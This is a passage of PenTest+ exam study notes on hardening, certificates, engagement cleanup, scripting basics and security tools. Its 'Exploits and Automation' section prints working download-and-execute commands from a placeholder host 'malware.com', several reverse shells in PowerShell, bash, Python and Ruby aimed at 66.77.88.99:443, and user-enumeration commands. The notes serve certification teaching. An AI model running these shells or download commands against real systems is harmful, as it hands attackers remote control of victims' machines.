o Software Development Life Cycle

▪ A subset of a system’s development which focuses on the creation of
software to support a given solution

▪ Validation Testing
● Meets requirements
▪ Acceptance Testing
● Accepted by end users

▪ Other Tests
● Unit testing
● Integration testing
● User acceptance testing
● Regression testing
● Peer review

- 175 -

● System Hardening
o The process by which a host or other device is made more secure through the
reduction of that device's attack surface
▪ Attack Surface
● The services and interfaces that allow a user or program to
communicate with a target system

o Any service or interface that is enabled through the default installation and left
unconfigured should be considered a vulnerability

o System Hardening Security Checklist

▪ Remove or disable devices that are not needed or used
▪ Install OS, application, firmware, and driver patches regularly
▪ Uninstall all unnecessary network protocols
▪ Uninstall or disable all unnecessary services and shared folders
▪ Enforce Access Control Lists on all system resources
▪ Restrict user accounts to the least privileges needed
▪ Secure the local admin or root account by renaming it and changing
password
▪ Disable unnecessary default user and group accounts
▪ Verify permissions on system accounts and groups
▪ Install antimalware software and update its definitions regularly

▪ Consider how to also harden systems against availability attacks

o Patch Management
▪ Identifying, testing, and deploying OS and application updates
▪ Patches are often classified as critical, security-critical, recommended,
and optional
▪ Installing a patch can be an availability risk to a critical system that
requires the system to be rebooted
▪ Patches may not exist for legacy, proprietary, ICS/SCADA, or IOT systems
and devices

- 176 -

● Secure Coding
o Input Validation
▪ Any technique used to ensure that the data entered into a field or
variable in an application is handled appropriately by that application

▪ Input validation can be conducted locally (on client) or remotely (on

server)

▪ Warning
● Client-side input validation is more dangerous since it is
vulnerable to malware interference

▪ Server-side input validation can be time and resource intensive

▪ Input should still undergo server-side validation after passing client-side

validation

▪ Input should also be subjected to normalization or sanitization

● Normalization
o A string is stripped of illegal characters or substrings and
converted to the accepted character set

● Canonicalization Attack
o Attack method where input characters are encoded in
such a way as to evade vulnerable input validation
measures

o Output Encoding
▪ Output encoding mitigates against code injection and XSS attacks that
attempt to use input to run a script

o Parameterized Queries
▪ A technique that defends against SQL injection and insecure object
references by incorporating placeholders in a SQL query
▪ Parameterized queries are a form of output encoding

- 177 -

● Implementing MFA
o Single Sign-On (SSO)
▪ An authentication technology that enables a user to authenticate once
and receive authorizations for multiple services

o Advantage
▪ User does not need multiple user accounts and passwords

o Disadvantage
▪ If the user account is compromised, the attacker has access to everything

o Multifactor Authentication (MFA)

▪ An authentication scheme that requires the user to present at least two
different factors as credentials, from something you know, something
you have, something you are, something you do, and somewhere you are

▪ 2FA is when two factors are required for authentication

● Two-step verification
● Biometric
● Certificate-based
● Location-based

▪ Encrypt your password when storing them and use good database
solution

● Digital Certificates
o Certificate Management
▪ Certificate Lifecycle
● Generate
o Focused on policies and processes that allow a certificate
to be requested and issued to a client or device

● Provision
o Focused on describing the different types of certificates
and the conditions under which those certificates will be
issued to a client or device

- 178 -

● Discover
o Focus its efforts on incorporating modern capabilities into
the environment to scan and identify the certificates in use

● Inventory
o Formally document every certificate in use, including
information about those certificates

● Monitor
o Uses mechanisms to identify any changes to the
certificates or any suspicious activity related to a
certificate's usage

● Protect
o Focused on the protection of the private keys through the
use of technical controls like using key encrypting keys and
bit splitting techniques

● Renew
o Renew our digital certificates by replacing them with
newer, more updated versions to the maximum extent
possible

● Revoke
o Identify the need for revocation of a digital certificate and
follow those procedures when needed

o Reasons for Revocation

▪ Cessation of operation
▪ CA compromise
▪ Key compromise
▪ Superseded
▪ Unspecified

o A suspension can be reinstated, but a revocation cannot

- 179 -

o Certificate Revocation List (CRL)

▪ An online list of digital certificates revoked by the
certificate authority
o Online Certificate Status Protocol (OCSP)
▪ Determines the revocation status of a digital
certificate using its serial number
o Certificate Pinning
▪ A method of trusting digital certificates that bypass the CA hierarchy and
chain of trust
● HTTP public key pinning allows a website to resist impersonation
attacks

o Certificate Stapling
▪ Allows a web server to perform certificate status check
▪ Eliminates the need for additional connection at the time of the request

o HTTP Strict Transport Security (HSTS)

▪ Allows a web server to notify web browsers to only request using HTTPS
and not HTTP
▪ Strict-Transport-Security header with an expiration date and time

● Other Technical Controls

o Key Rotation
▪ The process of changing keys on a periodic basis to mitigate against the
possibility of a brute-force attack of an unidentified key breach

o Secret Management Solution

▪ A platform used to control passwords, key pairs, and other sensitive
information that needs to be securely stored
o Process-Level Remediation
- 180 -

▪ Focused on resolving findings by changing how a process or protocol is

used or implemented

o Network Segmentation
▪ Divides system infrastructure into different physical or virtual
subdivisions

● Mitigation Strategies
o Prioritize the findings and recommendations based on the threat, the risk rating,
and the cost of implementation

o Remediation Categories
▪ Technology

▪ Processes
● The idea of mitigating things through processes is to figure out
exactly how you can fix things by changing the way the
organization is operating
● Problems do not always have a technology solution

▪ People
● Recommend better training for their administrators, or hire more
people depending on the problem

o Present your findings and propose a solution

▪ Local Administrator Password Solution (LAPS)
● Manages all local admin passwords without having to have the
same password on every machine across the domain

▪ Weak Password Complexity

● Change their password policy and recommend creating a
minimum password requirement

▪ Plain text Passwords

● All passwords must be stored as hashes or in another encrypted
format
▪ No Multifactor Authentication

- 181 -

● Recommend adding another factor from at least two of the four

categories
o Something you know
o Something you have
o Something you are
o Something you do

▪ SQL Injections
● Sanitize user input
● Parameterize queries

▪ Unnecessarily Open Services

● Go through system hardening practices
● Disable unnecessary services
● Uninstall unused programs
● Close unused ports

● Anything that is unnecessary in terms of services or programs

should be disabled or uninstalled

Post-Report Activities
- 182 -

● Post-Report Activities
o Domain 4: Reporting and Communication
▪ Objective 4.4
● Explain post-report delivery activities

o Purpose
▪ This ensures no artifacts or evidence were left on the target system

o Cleanup Tasks
▪ Delete files
▪ Remove accounts
▪ Uninstall tools
▪ Restore configurations
▪ Restore log files
▪ Purge sensitive details

● Remove Shells and Tools

o Keep detailed notes of everything that was installed and every system that was
exploited
▪ Linux
● Crontab
● Startup script

▪ Windows
● Startup
● Registry key
● Advanced techniques
● Task scheduler

o Remove these shells and tools to keep anyone from using them to their own
advantage

o Some tools may have been loaded into memory when fileless malware was used

● Delete Test Credentials

- 183 -

o Local Accounts
o Domain Accounts
o Web Application Accounts

o Delete all accounts used on different systems

o Delete all created domain accounts in Active Directory
o Some web application accounts require manual deletion in the user account
database
o Delete all created accounts used for an engagement

● Destroy Test Data

o Systems
o Attacking Machines
o Internal Shared Drives

o Linux
▪ Data Shredding
● The process of securely destroying the data by overwriting
storage with new data or a series of random ones and zeroes

o Windows
▪ Install third-party tools
▪ Save to an external hard drive

o Ensure all collected data has been properly destroyed

● Client Acceptance
o Establish an ongoing relationship with your target organizations
▪ Repeat business
▪ Prework and reconnaissance
▪ Work efficiency

o Show the client the value of the penetration test

● Attestation of Findings

- 184 -

o Attestation requirement depends on the target organization’s reason for the

penetration test
▪ Summary of findings
▪ Proof of security assessment

o The attestation of findings is different from the report as the former also
includes evidence

● Lessons Learned
o An analysis of the events that could provide insights into how to improve
penetration testing process in the future

o Lessons learned meetings should be structured by asking basic questions

▪ What went well?
▪ What didn’t go so well?
▪ What could be done better?
▪ What didn’t go as planned?

▪ People skills
▪ Processes and technology
▪ Client engagement
▪ Vulnerabilities and exploits

o Lessons learned report or after-action report (AAR)

Scripting Basics
- 185 -

● Scripting Basics
o Domain 5: Tools and Code Analysis
▪ Objective 5.1
● Explain the basic concepts of scripting and software development
▪ Objective 5.2
● Given a scenario, analyze a script or code sample for use in a
penetration test

o Scripting Languages
▪ Covered using pseudocode
● Bash
● PowerShell
● Python
● Ruby
● Perl
● JavaScript

● Scripting Tools
o Issuing commands individually can be useful for one-time analysis, but scripting
allows recurring searches to be repeated easily and automated

o Script
▪ A list of commands that are executed by a certain program
or scripting engine

● Bash
o A scripting language and command shell for Unix-like
systems that is the default shell for Linux and macOS
o Bash supports elements such as variables, loops,
conditional statements, functions, and more

● PowerShell
o A scripting language and command shell for Windows
systems
o PowerShell supports elements such as variables, loops,
conditional statements, functions, and cmdlets that use a
Verb-Noun syntax

- 186 -

o Windows Management Instrumentation Command-Line

(WMIC)
▪ Program used to review log files on a remote
Windows machine

● Python and Ruby

o Interpreted, high-level, general-purpose programming
languages used heavily by cybersecurity analysts and
penetration testers

● Perl
o A general-purpose Unix scripting language used for text
manipulation

● JavaScript
o A scripting language that allows developers to do fancy
and complex things on a webpage

● Variables
o Used to store values and data for different data types

o Boolean
▪ A form of data with only two possible values (True or False)

o Integer
▪ A variable that stores an integer or a whole number that may be positive
or negative

- 187 -

o Float/Decimal/Real Number
▪ A variable that stores a decimal number

o Character
▪ A variable that can only store one ASCII character

o String
▪ A variable that can store multiple characters
▪ In pseudocode, no need to define the data type for each variable

o Constant
▪ Like a variable, but cannot be changed within the program once defined

● Loops
o A type of flow control that controls which order the code will be executed in a
given program

▪ For loop
● Used when the number of times to repeat a block of code is
known

▪ While loop
● Used when the number of times to repeat a block of code is not
known and will only stop until something happens

▪ Do loop
● Used when there’s an indefinite iteration that needs to happen
and will only stop until some condition is met at the end of the
loop

● Logic Control
o Used to provide conditions based on different logical tests
▪ Boolean operator
▪ Arithmetic operator

- 188 -

▪ String operator

● Data Structures

o JavaScript Object Notation (JSON)

▪ An open data file format and data exchange standard that uses human-
readable text to store and transmit data objects
▪ JSON is a data format that is language-independent

o Key Value Pair

▪ Assigns some value to some type of title or key that might be used as a
variable

o Array
▪ A type of data structure that is used to hold multiple values of the same
type

o Dictionary
▪ An array of key value pairs

o List
▪ A type of data structure that can hold multiple values of different data
types in a sequential manner
▪ Every element on a list is called an index

- 189 -

o Tree
▪ A non-linear data structure that is used to create a hierarchy

● Object-Oriented Programming
o Object-Oriented Programming
▪ A programming paradigm based on the concept of “objects”, which can
contain data (fields) and code (procedures)
▪ Most of the programming languages are object-oriented

o Function
▪ A block of code that is given a special name which can be called to
perform the code within in

o Procedure
▪ Can be anything such as a function, method, routine, or subroutines that
takes input, generates output, and manipulates data

o Class
▪ The definition for the data format and the available procedures for a
given type or class of object

o Library
▪ Takes and places pieces of code into reusable areas
▪ It is an external collection of different classes, functions, and procedures
that can be reused

Analyzing Scripts
● Analyzing Scripts
o You must be able to analyze code snippets and identify their functions

- 190 -

o Domain 5: Tools and Code Analysis

▪ Objective 5.2
● Given a scenario, analyze a script or code sample for use in a
penetration test

▪ The official CompTIA PenTest+ Student Guide for PT0-002, Chapter 15,
has a complete coverage of the objectives

o What kind of questions to expect?

▪ Identify vulnerability
▪ Identify function

● Coding in Bash
o Bash
▪ A command-line scripting language used for the command shell inside
Unix-like systems
▪ Bash is not an object-oriented programming language

o Starting Line
▪ #!/bin/bash
o Comment
▪ # This is the first line of my script
▪ # This script is used to do backups of my systems

o Variables

- 191 -

▪ variable = value
CustomerName = Jason
$CustomerName

▪ declare option VariableName = value

declare -i PhoneNumber = 1111111
declare -r Pi = 3.14

o Arrays
▪ tempArray = (value1, value2, value3)
tempArray[position]
$tempArray[1] => value2

o Named and Associative Arrays

▪ declare -A PhoneBook

PhoneBook[name] = “Jason”
PhoneBook[number] = “111-1111”

${PhoneBook[name]}
${PhoneBook[number]}

o Comparisons
▪ Arithmetic
● is equal to
o if [ “$a” -eq “$b” ]

● is not equal to
o if [ “$a” -ne “$b” ]

● is greater than
o if [ “$a” -gt “$b” ]

● is greater than or equal to

o if [ “$a” -ge “$b” ]

● is less than
o if [ “$a” -lt “$b” ]

- 192 -

● is less than or equal to

o if [ “$a” -le “$b” ]

● is less than (within double parentheses)

o ((“$a” < “$b”))

▪ String Comparison
● is equal to
o if [ “$a” = “$b” ]
if [ “$a” == “$b” ]

● is not equal to
o if [ “$a” != “$b” ]

● is less than (in ASCII alphabetical order)

o if [ “$a” \< “$b” ]
if [[ “$a” < “$b” ]]

● is greater than (in ASCII alphabetical order)

o if [ “$a” \> “$b” ]
if [[ “$a” > “$b” ]]

o Logical Comparisons
▪ if [condition]
then
# do some command
fi

▪ if [<condition>]
then
# code here
elif [<condition>]
then
# code here
else
# code here
fi

- 193 -

o Flow Control
▪ For Do Done
● Performs a set of commands for each item in a list
● for var in <list>
do
<commands>
done

▪ While Do Done
● Performs a set of commands while a test is true
● while [ <some test> ]
do
<commands>
done

▪ Until Do Done
● Performs a set of commands until a test is true
● until [ <some test> ]
do
<commands>
done

o String Operations
▪ The commands used to manipulate data in string format
▪ testString = “Test String”
echo $testString
Test String

▪ testString = “Test String”

echo ${testString:2:4}
st S

o Inputting and Outputting Data

▪ echo “Please enter your name:”
read UserName
echo “Hello $UserName!”

- 194 -

o Reading and Writing Data into Files

▪ TempFile=$(<filename)

▪ TempFile=$(<test.txt)
echo “$TempFile”

▪ < means input, > means output

▪ > overwrites, >> appends

● echo “This is now going to be added to the end of the file as the
next line” >> test.txt

● Coding in PowerShell
o Comment
▪ # This is the first line of my script

▪ <#
This is a comment block. You can use this to comment out large sections
of text or code in your scripts.
#>

o Variables
▪ $variable = value
$CustomerName = Jason

▪ [int]$AnswerNumber = 42

▪ [string]$AnswerString = “The life, the universe, and everything.”

▪ To declare a constant, simply make the variable read only

● Set-Variable Pi -Option ReadOnly -Value 3.14159

o Arrays
▪ Allows for the storage of multiple values and reference them from a
single name

- 195 -

▪ $tempArray = @()

$tempArray = @(‘Jason’, ‘Sahra’, ‘Eduardo’, ‘Linda’)

$tempArray[position]

$tempArray[1] => Sahra

o Named and Associative Arrays

▪ $PhoneBook = @{}
$PhoneBook.name = ‘Jason’
$PhoneBook.number = ‘321-1234’
$PhoneBook.name

$PhoneBook = @{‘name’=‘Jason’, ‘number’=‘321-1234’}

$PhoneBook.number

o Comparisons
▪ is equal to
● $a -eq $b

▪ is not equal to
● $a -ne $b

▪ is greater than
● $a -gt $b

▪ is greater than or equal to

● $a -ge $b

▪ is less than
● $a -lt $b

▪ is less than or equal to

● $a -le $b

o Conditional Statements

- 196 -

▪ if (condition) {
# then do some command
}

▪ if (condition)
{
# code here
}
else
{
# code here
}

▪ if (condition)
{
# code here
}
elseif (condition)
{
# code here
}
else
{
# code here
}

o Flow Control
▪ For
● Performs a set of commands for each item in a list
● for (<Init>; <Condition>; <Repeat>)
{
<Statement list>
}

▪ Do While
● Performs a set of commands while a test is true
● Do
{

- 197 -

# commands
}
While ($this -eq $that)

▪ Until Do
● Performs a set of commands until a test is true
● Do
{
# commands
}
Until ($this -eq $that)

o String Operations
▪ The commands used to manipulate data in string format
▪ $testString = “Test String”
Write-Host $testString + “2”
Test String2

▪ $testString = “Test String”

$testString.Substring(2,4)
st S

o Inputting and Outputting Data

▪ Write-Host “Please enter your name:”
Read-Host $UserName
Write-Host “Hello ” + $UserName + “!”

o Reading and Writing Data into Files

▪ $TempFile = Get-Content - Path C:\test.txt
Write-Host $TempFile

▪ Write-Host “This is the beginning of a new script log file” > script.log

▪ < means input, > means output

▪ > overwrites, >> appends

● .\enumerate.ps1 >> script.log

- 198 -

● Coding in Python
o Comment
▪ # This is the first line of my script
▪ # This script is used to do backups of my systems

o Variables
▪ variable = value
Price = 10

▪ Integer variable doesn’t use quotes around the value

▪ String variables use quotes around letters and numbers

▪ Vendor = “CompTIA”
Vendor = ‘CompTIA’
Vendor = “123”

▪ Price = int(42)
Price = float(42.00)
Price = str(“The life, the universe, and everything.”)

▪ Type the variable name to display or interact with that variable

▪ In Python, constants aren’t really used like in other languages

▪ By convention, uppercase words are treated as constants and lowercase

or title case words as variables

o Arrays
▪ tempArray = []

tempArray = [value1, value2, value3]

nameArray = [“Jason”, “Mary”, “Joe”, “Susan”]

tempArray[position]

nameArray[0] => Jason

- 199 -

o Named and Associative Arrays

▪ Python uses the term dictionary instead of an associative array

▪ PhoneBook = {}
PhoneBook = {‘name’=‘Jason’, ‘number’=‘321-1234’}

PhoneBook[“name”] => Jason

PhoneBook[“number”] => 321-1234

o Comparisons
▪ is equal to
● a == b

▪ is not equal to
● a != b OR a <> b

▪ is greater than
● a>b

▪ is greater than or equal to

● a >= b

▪ is less than
● a<b

▪ is less than or equal to

● a <= b

o Conditional Statements
▪ if (condition):
# then do something

▪ if (condition):
# then do something
else:
# do something else

- 200 -

▪ if (condition):
# then do something
elif (condition):
# then do something else
else:
# do this thing instead

o Flow Control
▪ For
● Performs a set of commands for each item in a list
● for x in list:
# Do something

▪ While
● Performs a set of commands while a test is true
● i=1
while i < 6:
print(i)
i = i +1

print (‘All done’)

▪ In Python, until loops are created by reversing the while loop’s logic
● i=1
while i > 5:
print(i)
i = i +1

print (‘All done’)

o String Operations
▪ testString = “Dion Training is helping me learn to code”
print(testString)

▪ print(testString, “ in Python” + “ today”)

- 201 -

o Inputting and Outputting Data

▪ userName = input(“Please enter your name:”)
print(“Hello ” + userName + “!”)

o Reading and Writing Data into Files

▪ tempFile = open(‘test.txt’, ‘w’) # write will overwrite any existing content

▪ tempFile = open(‘test.txt’, ‘a’) # append to the end without overwriting

▪ tempFile = open(‘test.txt’, ‘r’) # reads a file

▪ print(tempFile.read())

▪ print(tempFile.read(50)). # this would read the first 50 characters in the

file

▪ print(tempFile.readline(-5)). # this would read the last 5 lines of the file

● Coding in Perl
o Perl
▪ A language commonly used in Linux and Windows web servers to run
dynamic code

- 202 -

o Starting Line
▪ #!/bin/perl

o Comment
▪ # This is the first line of my script
▪ # This script is used to do backups of my systems

o Variables
▪ $variable = value;
$CustomerName = Jason;
$CustomerName

▪ There is no need to declare variable types in Perl

▪ use constant NAME => <value>;

o Arrays
▪ @tempArray = (value1, value2, value3);

@ages = (18, 21, 25, 30);

@names = (“Jason”, “Susan”, “David”, “Tamera”);

$tempArray[position]

$names[3] => Tamera

o Named and Associative Arrays

▪ %people = (“John”, 19, “Melinda”, 35, “Jonni”, 25);

$people{“Alex”} = 18;

$people{“Jonni”} => 25

o Comparisons
▪ Numeric
● is equal to
o if ($a == $b)

- 203 -

● is not equal to
o if ($a != $b)

● is greater than
o if ($a > $b)

● is greater than or equal to

o if ($a >= $b)

● is less than
o if ($a < $b)

● is less than or equal to

o if ($a <= $b)

▪ String Comparison
● is equal to
o if ($a -eq $b)

● is not equal to
o if ($a -ne $b)

● is greater than
o if ($a -gt $b)

● is greater than or equal to

o if ($a -ge $b)

● is less than
o if ($a -lt $b)

● is less than or equal to

o if ($a -le $b)
o Logical Operators
▪ && is AND
|| is OR

o Conditional Statements

- 204 -

▪ if(condition) {
# commands to run
}

▪ if(condition) {
# commands execute if given condition is true
} else {
# commands execute if given condition is false
}

▪ if(condition1) {
# commands execute if given condition1 is true
} elsif(condition2) {
# commands execute if given condition2 is true
} else {
# commands executive if the above conditions
aren’t true
}

o Flow Control
▪ For
● Performs a set of commands for each item in a list
● for (init; condition; increment) {
statement(s);
}

▪ While
● Performs a set of commands while a test is true
● while(condition) {
commands;
}

▪ Until Do
● Performs a set of commands until a test is true
● until(condition) {
commands;
}

- 205 -

o String Operations
▪ $testString = “Test String”
printf($testString);
Test String

▪ $sub_teststring1 = substr($testString, 1);

$sub_teststring2 = substr($testString, 1,5);
printf($sub_testString2);
est_S

▪ Count positions from the end of the string using negative numbers

o Inputting and Outputting Data

▪ printf(“Please enter your name:”);
$string = <STDIN>;
printf(“You entered: $string”);

o Reading and Writing Data into Files

▪ open(DATA1, “<read.log”);
open(DATA2, “>write.log”);

▪ > overwrites, >> appends

▪ while (<DATA1>) {
printf(“$_”);
}

● Coding in JavaScript
o As a pentester, you will most often use JS when conducting cross-site scripting
attacks

o Starting Line
▪ main.js
▪ <script src=“scripts\main.js”></script>
▪ <script>code</script>

- 206 -

o Comment
▪ // This is the first line of my script
▪ /*
This is a multi-line
comment block
*/

o Variables
▪ let variable = value;
let CustomerName = ‘Jason’;
CustomerName = ‘Dion’;

▪ const PI = 3.14159

o Arrays
▪ let tempArray = [value1, value2, value3);

let listOfNames = [‘Jason’, ‘Mary’, ‘Christle’, ‘Tim’];

listOfNames[position]

listOfNames[1] => Mary

▪ JavaScript doesn’t have named or associative arrays like some other

languages

▪ var myPhoneBook = {};

var myPhoneBook = {Jason: 111-1234,
Mary: 222-5678};

▪
myPhoneBook.Jason
myPhoneBook.Jason = 333-1234;
myPhoneBook[“Jason”] = 333-1234;
o Comparisons
▪ is equal to
● (num1 = num2)

▪ is not equal to

- 207 -

● (num1 != num2)

▪ is greater than
● (num1 > num2)

▪ is greater than or equal to

● (num1 >= num2)

▪ is less than
● (num1 < num2)

▪ is less than or equal to

● (num1 <= num2)

o Conditional Statements
▪ if (condition) {
# do something;
}

▪ if (condition) {
# do something;
} else {
# do something else;
}

▪ if (condition) {
# do something;
} else if (condition) {
# do something else;
} else {
# do something else;
}

o Flow Control
▪ For
● Performs a set of commands for each item in a list

- 208 -

● for (init; condition; increment) {

<commands>;
}

▪ While
● Performs a set of commands while a test is true
● while (condition) {
<commands>;
}

▪ Do While
● Performs a set of commands until a test is true
● do {
<commands>;

}
while (condition);

o String Operations
▪ let text = “Dion Training”;
text.substring(start position, end position);
let result = text.substring(1, 4);
ion

▪ If using a negative number as the starting position, it will start at the 0

position

▪ let text = “Dion Training”;

text.substring(start position, end position);
let result = text.substring(text.length - 3,5);
Train

o Inputting and Outputting Data

▪ var customerName = prompt(“Please enter your name”);

- 209 -

if (customerName!= null) {
document.getElementById(“welcome”).innerHTML =
“Hello “ + customerName + “, How are you today?”;
}

o Reading and Writing Data into Files

▪ Node.js
● A backend JavaScript framework used to write automations

▪ Use the command fs.appendFile to append data to a file

● Coding in Ruby
o Starting Line
- 210 -

▪ #!/usr/bin/ruby

o Comment
▪ # This is the first line of my script

o Variables

▪ Ruby treats constants just like variables, because they don’t really have
constants

o Arrays
▪ tempArray = Array.new (20) # this creates an array with 20 locations for
you to store things in it

tempArray = [value1, value2, value3]

tempArray.at(n)

tempArray.at(1) => value2

o Named and Associative Arrays

▪ phoneBook = [ [ ‘Jason’, ‘111-1234’],
[‘Mary’, ‘222-5678’] ]
phoneBook.assoc(‘Mary’) => [‘Mary’,
‘222-5678’]
o Comparisons
▪ is equal to

- 211 -

● if a == b

▪ is not equal to
● if a != b

▪ is greater than
● if a > b

▪ is greater than or equal to

● if a >= b

▪ is less than
● if a < b

▪ is less than or equal to

● if a <= b

▪ ===
● is equal to in case statements instead of if statements

o Conditional Statements
▪ if condition
# do some command
end

▪ if condition
# do some command
else
# do something else
end

▪ if condition
# do some command
elsif condition
# do something else
else
# do some other thing
end

- 212 -

o Flow Control
▪ For
● Performs a set of commands for each item in a list
● for var in <list>
# do something
end

▪ While
● Performs a set of commands while a test is true
● while condition
# do commands
end

▪ Until
● Performs a set of commands until a test is true
● until condition
# do commands
end

o Substring Operations
▪ testString = “Test String”
puts testString
Test String

▪ testString = “Test String”

puts testString[2..5]
st S

▪ Using a negative number as the starting position counts from the end of
the string as -1. -2. -3, etc.

o Inputting and Outputting Data

▪ Output to the screen in Ruby can be done using the puts or print
commands

● Puts
o Outputs the string to a new line

- 213 -

● Print
o Uses the same line unless a
new line character is specified

● puts “Please enter your name:”

userName = gets
puts “Hello ” + username

Please enter your name: Jason

Hello Jason

o Reading and Writing Data into Files

▪ f = File.open(‘commands.log’, ‘w’)
f.puts “This is a log of the commands I ran:”
f.close

▪ < overwrites, << appends

▪ f << “This is another log entry”

▪ f = File.open(‘commands.log’)

while line = f.gets do

puts line
end

f.close

Exploits and Automation

- 214 -

● Exploits and Automation

o Domain 5: Tools and Code Analysis
▪ Objective 5.2
● Given a scenario, analyze a script or code sample for use in a
penetration test

● Exploits to Download Files

o PowerShell (Download and Run a Script )
▪ powershell.exe -c “IEX((New-Object System.Net.WebClient).
DownloadString(‘https://malware.com/badstuff.ps1’))”

o PowerShell (Download a File)

▪ powershell.exe -c “(New-Object System.Net.WebClient).
DownloadFile(“https://malware.com/badstuff.zip”,
“C:\Windows\Temp\downloaded.zip”)”

o Python (Download a File)

▪ import requests
url = ‘https://malware.com/badstuff.zip’
r = requests.get(url, allow_redirects=True)
open(‘downloaded.zip’, ‘wb’).write(r.content)

● Exploits for Remote Access

o PowerShell (Remote Access Payload)
▪ msfvenom -p cmd/windows/reverse_powershell lhost=66.77.88.99
lport=443 > script.ps1

o PowerShell (Reverse Script)

▪ $client = New-Object System.Net.Sockets.TCPClient(“66.77.88.99”,443);
$stream = $client.GetStream();
[byte[ ] ]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + “PS ” + (pwd).Path + “> ”;

- 215 -

$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush( )};
$client.Close( )

o Bash (Reverse Shell)

▪ bash -i >& /dev/tcp/66.77.88.99/443 0>&1

o Python (Linux Reverse Shell)

▪ export RHOST=“66.77.88.99”;
export RPORT=443;
python -c ‘import socket,os,pty;
s=socket.socket();
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
pty.spawn(“/bin/sh”)’

o Ruby (Linux Reverse Shell)

▪ ruby -rsocket –e’f=TCPSocket.open(“66.77.88.99”,443).to_i;
exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

o Ruby (Windows Reverse Shell)

▪ ruby -rsocket -e ‘c=TCPSocket.new(“66.77.88.99”,“443”);
while(cmd=c.gets);IO.popen(cmd,“r”){|io|c.print io.read}end’

● Exploits for Enumerating Users

o PowerShell (List All Users in a Domain)
▪ Import-Module ActiveDirectory; Get-ADUser -Identity <username> -
properties *

o PowerShell (List All Users in a Group)

▪ Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership
<username> | select Administrator

o Bash (List All Users on a System)

▪ cat /etc/passwd

- 216 -

o Bash (List All Users on a System)

▪ awk –F’:‘ ’{ print $1}’ /etc/passwd

o Bash (List All Logged in Users)

▪ who | awk ‘{print $1}’ | sort | uniq | tr ‘\n’ ‘ ’

o Python (List Groups for Users)

▪ #!/usr/bin/python
def read_and_parse(filename):
# Reads and parses lines from /etc/passwd and /etc/group. Takes
filename (a string with full path to filename) as input
data = [ ]
with open(filename, “r”) as f:
for line in f.readlines( ):
data.append(line.split(“:”)[0])
data.sort( )
for item in data:
print(“- ” + item)
read_and_parse(“/etc/group”)
read_and_parse(“/etc/passwd”)

● Exploits for Enumerating Assets

o PowerShell (List All Domain Controllers)
▪ Import-Module ActiveDirectory; Get-ADDomainController -Filter * |
Select-Object name, domain

o PowerShell (Get Info on Computer/Host)

▪ Import-Module ActiveDirectory;
Get-ADComputer -Filter {Name -Like "<hostname>"} -Property * |
Format-Table Name,ipv4address,OperatingSystem,
OperatingSystemServicePack,LastLogonDate -Wrap -Auto

o Bash (Enumerate an Asset)

▪ hostname; uname -a; arp; route; dpkg
o Python (Identify Hosts on a Subnet)

- 217 -

▪ import socket
def connect(hostname, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((hostname, port))
sock.close()
return result == 0
for i in range(0,255):
res = connect("192.168.1."+str(i), 80)
if res:
print("Device found at: ", "192.168.1."+str(i) + ":"+str(80))

● Automation in Engagements
o Automate actions using a script and do follow-on actions using another script
based on the results of the previous action
▪ Scan against a subnet range
▪ Import file containing targets

o A lot of these tools are already available online

● Automation with Nmap Scripts

o /usr/share/nmap/scripts/vulscan
o C:\Program Files (x86)\Nmap\script

o Determine the needed scripts to use based on the objectives

▪ vulners
▪ ssl-enum-ciphers

o vulners
▪ Has a vast database of vulnerabilities that can be used against web
servers

o ssl-enum-ciphers
▪ Identifies what ciphers are being used by secure web servers running Port
443

- 218 -

Tool Round-up
● Tool Round-up
o Domain 5: Tools and Code Analysis
▪ Objective 5.3
● Explain use cases of the following tools during the phases of a
penetration test
● The goal is to associate the tool with its use case

o Sample Question
▪ Which tool could be used to collect frames and packets sent over a
wireless network?
A. John the Ripper
B. Nessus
C. Netcat
D. Aircrack-ng

● OSINT Tools
o OSINT Tools
▪ Find actionable intelligence from various publicly available sources

o WHOIS
▪ A query and response protocol that is widely used for querying databases
that store the registered users or assignees of an Internet resource

- 219 -

o Nslookup
▪ A network administration command-line tool for querying DNS to obtain
the mapping between domain names and IP addresses, or other DNS
records

o Fingerprinting Organizations with Collected Archives (FOCA)

▪ Used to find metadata and hidden information in collected documents
from an organization

o theHarvester
▪ A program for gathering emails, subdomains, hosts, employee names,
email addresses, PGP key entries, open ports, and service banners from
servers

o Shodan
▪ A website search engine for web cameras, routers, servers, and other
devices that are considered part of the Internet of things

o Maltego
▪ A piece of commercial software used for conducting open-source
intelligence that visually helps connect those relationships
▪ It can automate the querying of public sources of data and then compare
it with other info from various sources

o Recon-ng
▪ Uses a system of modules to add additional features and functions for
your use
▪ It is a cross-platform web reconnaissance framework

o Censys
▪ A website search engine used for finding hosts and networks across the
Internet with data about their configuration

- 220 -

● Scanning Tools
o Scanning Tools
▪ Used to identify potential vulnerabilities in a system, server, network,
software, service, or application

o Nikto
▪ A web vulnerability scanner that is used to assess custom web
applications that a company may have coded themselves
▪ perl nikto.pl -h <IP address>

o OpenVAS
▪ An open-source vulnerability scanner that is used to identify
vulnerabilities and assign a risk rating for the targeted assets

o Nessus
▪ A proprietary vulnerability scanner that is used conduct basic, advanced,
and compliance vulnerability scans to measure the effectiveness of the
system’s security controls

o SQLmap
▪ An open-source database scanner that searches for SQL injection
vulnerabilities that can be exploited

o Open SCAP (Security Content Automation Protocol)

▪ A tool created by NIST that is used to create a predetermined security
baseline that can be used to determine vulnerabilities or deviations in a
system

o Wapiti
- 221 -

▪
A web application vulnerability scanner which will automatically navigate
a web app looking for areas where it can inject data to target different
vulnerabilities
o WPScan
▪ A WordPress site vulnerability scanner that identifies the plugins used by
the website against a database of known vulnerabilities

o Brakeman
▪ A static code analysis security tool that is used to identify vulnerabilities
in applications written in Ruby on Rails

o ScoutSuite
▪ An open-source tool written in Python that can be used to audit instances
